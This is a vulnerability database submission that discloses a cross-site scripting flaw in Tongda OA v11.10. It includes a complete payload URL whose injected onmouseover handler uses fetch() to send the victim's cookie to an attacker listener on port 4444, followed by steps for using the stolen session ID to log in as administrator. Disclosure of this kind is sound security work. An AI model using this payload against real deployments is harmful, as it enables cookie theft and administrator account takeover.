| Titel | The presence of xss in Tongda v11.10 may allow an attacker to obtain the administrator cookie to log in to the backend |
|---|
| Beschreibung | Hi~, I found an xss in Tongda OA v11.10, which can leak the administrator cookie through a malicious link constructed by the attacker. At the same time, V11 has session fixation, and the attacker can log in to the administrator background through the obtained SESSIONID.
The reproduction process is as follows:
Construct the payload:
http://xxx.xxx.xxx.xxx/general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=)%df%22onmouseover=fetch(`http://192.168.110.160:4444?${document.cookie}` );//%df%22
Listen on port 4444 on the attacker server,when the victim clicks on the link and the mouse hovers over the word "Settings"
Then you can splicing after /general/index.php ?SESSIONID=xxx (obtained SESSIONID) to log in to the administrator background
Official website: https://www.tongda2000.com/
Version: v11.10, v2017
Route: general/ipanel/menu_code.php
|
|---|
| Quelle | ⚠️ https://github.com/Mykonos-x/cve/tree/main/cve/tongda/v11/xss |
|---|
| Benutzer | AnatomyX (UID 45354) |
|---|
| Einreichung | 12.09.2023 14:55 (vor 3 Jahren) |
|---|
| Moderieren | 16.09.2023 14:34 (4 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 239868 [Tongda OA 11.10 menu_code.php?MENU_TYPE=FAV OA_SUB_WINDOW Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|